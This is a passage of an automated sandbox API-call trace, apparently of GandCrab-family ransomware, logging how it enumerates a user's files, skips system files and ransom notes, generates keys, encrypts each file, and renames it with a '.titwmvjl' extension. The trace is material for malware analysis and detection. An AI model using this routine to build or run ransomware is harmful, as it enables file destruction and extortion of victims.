lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.187] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.191] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.191] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.191] CloseHandle (hObject=0x2b4) returned 1 [0086.192] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uy9n7oujpeehlg4 _s.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uy9n7oujpeehlg4 _s.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0086.193] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.193] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.193] lstrcmpW (lpString1="w- GEi38ff.swf", lpString2=".") returned 1 [0086.193] lstrcmpW (lpString1="w- GEi38ff.swf", lpString2="..") returned 1 [0086.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="w- GEi38ff.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf" [0086.193] lstrlenW (lpString=".titwmvjl") returned 9 [0086.193] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned 52 [0086.193] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.193] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf.titwmvjl") returned 61 [0086.193] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned 52 [0086.193] lstrlenW (lpString=".swf") returned 4 [0086.193] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.194] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0086.194] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0086.194] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned 52 [0086.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned 52 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="desktop.ini") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="autorun.inf") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="ntuser.dat") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="iconcache.db") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="bootsect.bak") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="boot.ini") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="ntuser.dat.log") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="thumbs.db") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="ntldr") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="NTDETECT.COM") returned 1 [0086.194] lstrcmpiW (lpString1="w- GEi38ff.swf", lpString2="Bootfont.bin") returned 1 [0086.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf") returned 52 [0086.194] lstrlenW (lpString=".swf") returned 4 [0086.194] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.195] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0086.195] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.195] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.195] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\w- gei38ff.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.195] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.195] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.196] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.197] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.198] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.198] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.198] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.198] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.199] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.199] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.199] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.200] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.200] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.201] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.201] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.201] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.201] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.201] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.203] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0086.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.203] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.203] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.203] GetLastError () returned 0x0 [0086.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.203] CryptDestroyKey (hKey=0x5032f8) returned 1 [0086.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.204] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.204] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.205] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0086.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.205] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.206] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.206] GetLastError () returned 0x0 [0086.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.206] CryptDestroyKey (hKey=0x503278) returned 1 [0086.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.206] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.206] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.206] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.207] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xcfff, lpOverlapped=0x0) returned 1 [0086.219] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff3001, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcfff, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xcfff, lpOverlapped=0x0) returned 1 [0086.220] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.222] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] CloseHandle (hObject=0x2b4) returned 1 [0086.227] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\w- gei38ff.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\w- GEi38ff.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\w- gei38ff.swf.titwmvjl"), dwFlags=0x1) returned 1 [0086.228] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.228] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.228] lstrcmpW (lpString1="XLIMCYCuHSCE.jpg", lpString2=".") returned 1 [0086.228] lstrcmpW (lpString1="XLIMCYCuHSCE.jpg", lpString2="..") returned 1 [0086.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="XLIMCYCuHSCE.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg" [0086.228] lstrlenW (lpString=".titwmvjl") returned 9 [0086.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned 54 [0086.228] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.228] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg.titwmvjl") returned 63 [0086.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned 54 [0086.228] lstrlenW (lpString=".jpg") returned 4 [0086.228] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.228] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0086.228] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0086.228] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned 54 [0086.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned 54 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="desktop.ini") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="autorun.inf") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="ntuser.dat") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="iconcache.db") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="bootsect.bak") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="boot.ini") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="ntuser.dat.log") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="thumbs.db") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="ntldr") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="NTDETECT.COM") returned 1 [0086.229] lstrcmpiW (lpString1="XLIMCYCuHSCE.jpg", lpString2="Bootfont.bin") returned 1 [0086.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg") returned 54 [0086.229] lstrlenW (lpString=".jpg") returned 4 [0086.229] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.229] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0086.229] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.229] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xlimcycuhsce.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.230] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.230] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.231] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.231] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.231] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.232] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.232] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.232] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.232] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.232] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.233] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.233] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.233] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.233] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.234] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.234] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.234] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.234] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.234] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.235] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.235] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.235] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.235] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.236] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0086.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.237] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.237] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.237] GetLastError () returned 0x0 [0086.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.237] CryptDestroyKey (hKey=0x503338) returned 1 [0086.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.237] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.238] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.239] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0086.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.239] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.239] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.239] GetLastError () returned 0x0 [0086.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.240] CryptDestroyKey (hKey=0x503938) returned 1 [0086.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.240] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.240] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.240] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.240] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x5015, lpOverlapped=0x0) returned 1 [0086.253] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffafeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5015, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x5015, lpOverlapped=0x0) returned 1 [0086.257] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.259] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.262] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.263] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.263] CloseHandle (hObject=0x2b4) returned 1 [0086.263] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xlimcycuhsce.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\XLIMCYCuHSCE.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xlimcycuhsce.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0086.264] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.264] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.264] lstrcmpW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2=".") returned 1 [0086.264] lstrcmpW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="..") returned 1 [0086.264] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="YkS_oztkhnLjlc1Hk2.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv" [0086.264] lstrlenW (lpString=".titwmvjl") returned 9 [0086.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned 60 [0086.264] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.265] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv.titwmvjl") returned 69 [0086.265] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned 60 [0086.265] lstrlenW (lpString=".flv") returned 4 [0086.265] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.265] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0086.265] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0086.265] VirtualFree (lpAddress=0x2410000, 